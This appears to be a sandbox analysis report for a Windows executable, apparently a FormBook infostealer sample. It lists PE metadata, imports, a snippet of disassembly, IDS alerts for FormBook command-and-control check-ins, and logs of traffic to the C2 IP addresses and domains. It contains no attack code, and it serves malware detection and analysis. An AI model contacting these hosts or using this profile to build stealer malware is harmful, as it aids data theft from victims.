            Time Stamp:0x6654B17D [Mon May 27 16:14:53 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:afcdf79be1557326c854b6e20cb900a7
            Instruction
            call 00007FE2D4CCCD0Dh
            jmp 00007FE2D4CBFAC4h
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            push edi
            push esi
            mov esi, dword ptr [esp+10h]
            mov ecx, dword ptr [esp+14h]
            mov edi, dword ptr [esp+0Ch]
            mov eax, ecx
            mov edx, ecx
            add eax, esi
            cmp edi, esi
            jbe 00007FE2D4CBFC4Ah
            cmp edi, eax
            jc 00007FE2D4CBFFAEh
            bt dword ptr [004C41FCh], 01h
            jnc 00007FE2D4CBFC49h
            rep movsb
            jmp 00007FE2D4CBFF5Ch
            cmp ecx, 00000080h
            jc 00007FE2D4CBFE14h
            mov eax, edi
            xor eax, esi
            test eax, 0000000Fh
            jne 00007FE2D4CBFC50h
            bt dword ptr [004BF324h], 01h
            jc 00007FE2D4CC0120h
            bt dword ptr [004C41FCh], 00000000h
            jnc 00007FE2D4CBFDEDh
            test edi, 00000003h
            jne 00007FE2D4CBFDFEh
            test esi, 00000003h
            jne 00007FE2D4CBFDDDh
            bt edi, 02h
            jnc 00007FE2D4CBFC4Fh
            mov eax, dword ptr [esi]
            sub ecx, 04h
            lea esi, dword ptr [esi+04h]
            mov dword ptr [edi], eax
            lea edi, dword ptr [edi+04h]
            bt edi, 03h
            jnc 00007FE2D4CBFC53h
            movq xmm1, qword ptr [esi]
            sub ecx, 08h
            lea esi, dword ptr [esi+08h]
            movq qword ptr [edi], xmm1
            lea edi, dword ptr [edi+08h]
            test esi, 00000007h
            je 00007FE2D4CBFCA5h
            bt esi, 03h
            Programming Language:
            • [ASM] VS2013 build 21005
            • [ C ] VS2013 build 21005
            • [C++] VS2013 build 21005
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            • [ASM] VS2013 UPD5 build 40629
            • [RES] VS2013 build 21005
            • [LNK] VS2013 UPD5 build 40629
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x521dc | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11b000 | 0x7134 | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0xc8000 | 0x521dc | 0x52200 | 6e27666788b9e4c696008d7c6a34d2be | False | 0.9205164335996956 | data | 7.876468035686738 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0x11b000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
            RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
            RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
            RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
            RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
            RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
            RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
            RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
            RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
            RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
            RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
            RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
            RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
            RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
            RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
            RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
            RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
            RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
            RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
            RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
            RT_RCDATA | 0xd07b8 | 0x49472 | data | | | 1.000336502901921
            RT_GROUP_ICON | 0x119c2c | 0x76 | data | English | Great Britain | 0.6610169491525424
            RT_GROUP_ICON | 0x119ca4 | 0x14 | data | English | Great Britain | 1.25
            RT_GROUP_ICON | 0x119cb8 | 0x14 | data | English | Great Britain | 1.15
            RT_GROUP_ICON | 0x119ccc | 0x14 | data | English | Great Britain | 1.25
            RT_VERSION | 0x119ce0 | 0x10c | data | English | Great Britain | 0.5970149253731343
            RT_MANIFEST | 0x119dec | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
            DLL | Import
            WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
            VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
            WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
            COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
            MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
            WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
            PSAPI.DLL | GetProcessMemoryInfo
            IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
            USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
            UxTheme.dll | IsThemeActive
            KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
            USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
            GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
            COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
            ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
            SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
            ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
            OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
            Language of compilation system | Country where language is spoken | Map
            English | Great Britain |
            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
            05/27/24-19:16:10.032522 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49713 | 80 | 192.168.2.5 | 194.58.112.174
            05/27/24-19:16:59.270961 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.5 | 188.114.96.3
            05/27/24-19:16:26.567429 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49718 | 80 | 192.168.2.5 | 43.132.225.97
            05/27/24-19:17:01.817147 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49722 | 80 | 192.168.2.5 | 188.114.96.3
            05/27/24-19:15:43.469777 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49711 | 80 | 192.168.2.5 | 66.113.136.229
            05/27/24-19:16:24.039251 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49717 | 80 | 192.168.2.5 | 43.132.225.97
            05/27/24-19:16:17.928509 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49716 | 80 | 192.168.2.5 | 194.58.112.174
            05/27/24-19:16:12.566468 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49714 | 80 | 192.168.2.5 | 194.58.112.174
            05/27/24-19:16:32.483493 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49720 | 80 | 192.168.2.5 | 43.132.225.97
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            May 27, 2024 19:15:43.464005947 CEST | 49711 | 80 | 192.168.2.5 | 66.113.136.229
            May 27, 2024 19:15:43.469041109 CEST | 80 | 49711 | 66.113.136.229 | 192.168.2.5
            May 27, 2024 19:15:43.469162941 CEST | 49711 | 80 | 192.168.2.5 | 66.113.136.229
            May 27, 2024 19:15:43.469777107 CEST | 49711 | 80 | 192.168.2.5 | 66.113.136.229
            May 27, 2024 19:15:43.474714041 CEST | 80 | 49711 | 66.113.136.229 | 192.168.2.5
            May 27, 2024 19:16:04.837353945 CEST | 80 | 49711 | 66.113.136.229 | 192.168.2.5
            May 27, 2024 19:16:04.837577105 CEST | 49711 | 80 | 192.168.2.5 | 66.113.136.229
            May 27, 2024 19:16:04.838138103 CEST | 49711 | 80 | 192.168.2.5 | 66.113.136.229
            May 27, 2024 19:16:04.844521999 CEST | 80 | 49711 | 66.113.136.229 | 192.168.2.5
            May 27, 2024 19:16:10.027160883 CEST | 49713 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:10.032246113 CEST | 80 | 49713 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:10.032464981 CEST | 49713 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:10.032521963 CEST | 49713 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:10.037974119 CEST | 80 | 49713 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:10.725030899 CEST | 80 | 49713 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:10.725083113 CEST | 80 | 49713 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:10.725147009 CEST | 49713 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:11.544758081 CEST | 49713 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:12.560751915 CEST | 49714 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:12.566195965 CEST | 80 | 49714 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:12.566304922 CEST | 49714 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:12.566468000 CEST | 49714 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:12.571455956 CEST | 80 | 49714 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:13.255140066 CEST | 80 | 49714 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:13.255197048 CEST | 80 | 49714 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:13.255264997 CEST | 49714 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:14.076118946 CEST | 49714 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:15.382242918 CEST | 49715 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:15.388149977 CEST | 80 | 49715 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:15.388263941 CEST | 49715 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:15.388653994 CEST | 49715 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:15.393770933 CEST | 80 | 49715 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:15.393810034 CEST | 80 | 49715 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:16.096960068 CEST | 80 | 49715 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:16.097286940 CEST | 80 | 49715 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:16.097351074 CEST | 49715 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:16.904418945 CEST | 49715 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:17.920212984 CEST | 49716 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:17.928112984 CEST | 80 | 49716 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:17.928210020 CEST | 49716 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:17.928508997 CEST | 49716 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:17.935483932 CEST | 80 | 49716 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:18.629443884 CEST | 80 | 49716 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:18.629622936 CEST | 80 | 49716 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:18.629918098 CEST | 49716 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:18.629988909 CEST | 49716 | 80 | 192.168.2.5 | 194.58.112.174
            May 27, 2024 19:16:18.635265112 CEST | 80 | 49716 | 194.58.112.174 | 192.168.2.5
            May 27, 2024 19:16:24.030953884 CEST | 49717 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:24.036022902 CEST | 80 | 49717 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:24.036144018 CEST | 49717 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:24.039251089 CEST | 49717 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:24.045866966 CEST | 80 | 49717 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:25.544811964 CEST | 49717 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:25.591711044 CEST | 80 | 49717 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:26.561976910 CEST | 49718 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:26.567120075 CEST | 80 | 49718 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:26.567200899 CEST | 49718 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:26.567429066 CEST | 49718 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:26.575087070 CEST | 80 | 49718 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:28.076133013 CEST | 49718 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:28.123605967 CEST | 80 | 49718 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:29.092524052 CEST | 49719 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:29.097748041 CEST | 80 | 49719 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:29.097979069 CEST | 49719 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:29.098670959 CEST | 49719 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:29.103703022 CEST | 80 | 49719 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:29.103926897 CEST | 80 | 49719 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:30.610555887 CEST | 49719 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:30.747574091 CEST | 80 | 49719 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:32.477917910 CEST | 49720 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:32.483213902 CEST | 80 | 49720 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:32.483328104 CEST | 49720 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:32.483493090 CEST | 49720 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:32.488382101 CEST | 80 | 49720 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:45.437998056 CEST | 80 | 49717 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:45.438146114 CEST | 49717 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:47.952203989 CEST | 80 | 49718 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:47.954204082 CEST | 49718 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:50.452187061 CEST | 80 | 49719 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:50.452250004 CEST | 49719 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:53.862335920 CEST | 80 | 49720 | 43.132.225.97 | 192.168.2.5
            May 27, 2024 19:16:53.866197109 CEST | 49720 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:53.866341114 CEST | 49720 | 80 | 192.168.2.5 | 43.132.225.97
            May 27, 2024 19:16:53.873918056 CEST | 80 | 49720 | 43.132.225.97 | 192.168.2.5
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            May 27, 2024 19:15:37.834064007 CEST | 63344 | 53 | 192.168.2.5 | 1.1.1.1
            May 27, 2024 19:15:37.866555929 CEST | 53 | 63344 | 1.1.1.1 | 192.168.2.5
            May 27, 2024 19:15:43.194463015 CEST | 64606 | 53 | 192.168.2.5 | 1.1.1.1
            May 27, 2024 19:15:43.459127903 CEST | 53 | 64606 | 1.1.1.1 | 192.168.2.5
            May 27, 2024 19:16:09.842380047 CEST | 60299 | 53 | 192.168.2.5 | 1.1.1.1
            May 27, 2024 19:16:10.026493073 CEST | 53 | 60299 | 1.1.1.1 | 192.168.2.5
            May 27, 2024 19:16:23.641004086 CEST | 54767 | 53 | 192.168.2.5 | 1.1.1.1
            May 27, 2024 19:16:24.030093908 CEST | 53 | 54767 | 1.1.1.1 | 192.168.2.5
            May 27, 2024 19:16:59.248620033 CEST | 60624 | 53 | 192.168.2.5 | 1.1.1.1
            May 27, 2024 19:16:59.264856100 CEST | 53 | 60624 | 1.1.1.1 | 192.168.2.5
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            May 27, 2024 19:15:37.834064007 CEST | 192.168.2.5 | 1.1.1.1 | 0xb68c | Standard query (0) | www.sweet777.work | A (IP address) | IN (0x0001) | false
            May 27, 2024 19:15:43.194463015 CEST | 192.168.2.5 | 1.1.1.1 | 0xa572 | Standard query (0) | www.goodroothealth.com | A (IP address) | IN (0x0001) | false
